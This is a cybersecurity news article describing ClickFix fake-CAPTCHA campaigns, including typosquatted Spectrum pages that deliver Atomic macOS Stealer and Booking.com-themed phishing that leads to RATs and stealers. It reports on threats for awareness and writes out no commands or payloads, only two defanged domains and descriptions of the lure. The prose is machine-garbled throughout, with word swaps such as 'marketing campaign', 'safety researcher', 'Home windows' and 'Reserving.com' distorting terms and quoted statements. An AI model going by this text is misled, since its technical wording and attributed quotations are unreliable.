Cybersecurity researchers are alerting to a brand new malware marketing campaign that employs the ClickFix social engineering tactic to trick customers into downloading an data stealer malware often known as Atomic macOS Stealer (AMOS) on Apple macOS techniques.
The marketing campaign, in accordance with CloudSEK, has been discovered to leverage typosquat domains mimicking U.S.-based telecom supplier Spectrum.
“macOS customers are served a malicious shell script designed to steal system passwords and obtain an AMOS variant for additional exploitation,” safety researcher Koushik Pal mentioned in a report revealed this week. “The script makes use of native macOS instructions to reap credentials, bypass safety mechanisms, and execute malicious binaries.”
It is believed that the exercise is the work of Russian-speaking cybercriminals owing to the presence of Russian language feedback within the malware’s supply code.
The place to begin of the assault is an online web page that impersonates Spectrum (“panel-spectrum[.]internet” or “spectrum-ticket[.]internet”). Guests to the websites in query are served a message that instructs them to finish a hCaptcha verification test to to be able to “overview the safety” of their connection earlier than continuing additional.
Nonetheless, when the person clicks the “I’m human” checkbox for analysis, they’re displayed an error message stating “CAPTCHA verification failed,” urging them to click on a button to go forward with an “Different Verification.”
Doing so causes a command to be copied to the customers’ clipboard and the sufferer is proven a set of directions relying on their working system. Whereas they’re guided to run a PowerShell command on Home windows by opening the Home windows Run dialog, it is substituted by a shell script that is executed by launching the Terminal app on macOS.
The shell script, for its half, prompts customers to enter their system password and downloads a next-stage payload, on this case, a identified stealer referred to as Atomic Stealer.
“Poorly applied logic within the supply websites, comparable to mismatched directions throughout platforms, factors to swiftly assembled infrastructure,” Pal mentioned.
“The supply pages in query for this AMOS variant marketing campaign contained inaccuracies in each its programming and front-end logic. For Linux person brokers, a PowerShell command was copied. Moreover, the instruction ‘Press & maintain the Home windows Key + R’ was exhibited to each Home windows and Mac customers.”
The disclosure comes amid a surge in campaigns utilizing the ClickFix tactic to ship a variety of malware households over the previous 12 months.
“Actors finishing up these focused assaults sometimes make the most of related methods, instruments, and procedures (TTPs) to realize preliminary entry,” Darktrace mentioned. “These embody spear phishing assaults, drive-by compromises, or exploiting belief in acquainted on-line platforms, comparable to GitHub, to ship malicious payloads.”
The hyperlinks distributed utilizing these vectors sometimes redirect the top person to a malicious URL that shows a faux CAPTCHA verification test in an try to deceive customers into pondering that they’re finishing up one thing innocuous, when, in actuality, they’re guided to execute malicious instructions to repair a non-existent difficulty.
The tip results of this efficient social engineering methodology is that customers find yourself compromising their very own techniques, enabling risk actors to bypass safety controls.
The cybersecurity firm mentioned it recognized a number of ClickFix assaults throughout buyer environments in Europe, the Center East, and Africa (EMEA), and in the US. And these campaigns are gaining steam, adopting a number of variations however working with the identical finish aim of delivering malicious payloads, starting from trojans to stealers to ransomware.
Earlier this week, Cofense outlined an electronic mail phishing marketing campaign that spoofs Reserving.com, concentrating on resort chains and the meals providers sector with faux CAPTCHAs that result in XWorm RAT, PureLogs Stealer, and DanaBot. The truth that ClickFix is versatile and simple to adapt makes it a horny malware distribution mechanism.
“Whereas the precise electronic mail construction varies from pattern to pattern, these campaigns usually present Reserving[.]com-spoofing emails with embedded hyperlinks to a ClickFix faux CAPTCHA website which is used to ship a malicious script that runs RATs and/or data stealers,” Cofense mentioned.
The e-mail safety agency mentioned it has additionally noticed ClickFix samples mimicking cookie consent banners, whereby clicking on the “Settle for” button causes a malicious script file to be downloaded. The person is subsequently prompted to run the script to simply accept cookies.
In a single April 2025 incident analyzed by Darktrace, unknown risk actors had been discovered to make the most of ClickFix as an assault vector to obtain nondescript payloads to burrow deeper into the goal setting, conduct lateral motion, ship system-related data to an exterior server through an HTTP POST request, and in the end exfiltrate information.
“ClickFix baiting is a extensively used tactic through which risk actors exploit human error to bypass safety defenses,” Darktrace mentioned. “By tricking endpoint customers into performing seemingly innocent, on a regular basis actions, attackers achieve preliminary entry to techniques the place they’ll entry and exfiltrate delicate information.”
Different ClickFix assaults have employed phony variations of different well-liked CAPTCHA providers like Google reCAPTCHA and Cloudflare Turnstile for malware supply below the guise of routine safety checks.
These faux pages are “pixel-perfect copies” of their reputable counterparts, typically even injected into real-but-hacked web sites to trick unsuspecting customers. Stealers comparable to Lumma and StealC, in addition to full-fledged distant entry trojans (RATs) like NetSupport RAT are a few of the payloads distributed through bogus Turnstile pages.
“Trendy web customers are inundated with spam checks, CAPTCHAs, and safety prompts on web sites, and so they’ve been conditioned to click on via these as shortly as potential,” SlashNext’s Daniel Kelley mentioned. “Attackers exploit this ‘verification fatigue,’ realizing that many customers will adjust to no matter steps are introduced if it seems routine.”
